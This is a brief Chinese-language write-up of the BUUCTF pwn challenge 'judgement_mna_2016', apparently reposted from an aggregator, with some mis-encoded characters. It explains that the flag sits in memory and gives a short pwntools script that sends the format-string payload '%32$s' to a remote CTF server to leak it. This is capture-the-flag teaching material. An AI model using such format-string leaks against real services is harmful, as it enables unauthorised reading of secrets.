[BUUCTF-pwn]——judgement_mna_2016

還行的一道題, 不過(guò)動(dòng)態(tài)調(diào)試的時(shí)候, 需要你手寫(xiě)一個(gè)flag.txt文件, 不然沒(méi)辦法動(dòng)態(tài)調(diào)試.

一看就知道這個(gè)地方儲(chǔ)存的flag,

如果不確定. 可以去看下start函數(shù)的匯編, 執(zhí)行main函數(shù)前就已經(jīng)將flag寫(xiě)入了
下面我們只需要計(jì)算偏移輸出就好, 記得自己在目錄下面寫(xiě)個(gè)flag.txt文件, 不然沒(méi)辦法調(diào)試的. 偏移0x1c 或者 0x20都可以

exploit

from pwn import * #p = process('./judgement_mna_2016') p = remote('node3.buuoj.cn',29011) #gdb.attach(p, 'b *0x080487A2') payload = '%32$s' # 28也可以 p.sendlineafter('Input flag >> ',payload) p.interactive()

總結(jié)

以上是生活随笔為你收集整理的[BUUCTF-pwn]——judgement_mna_2016的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。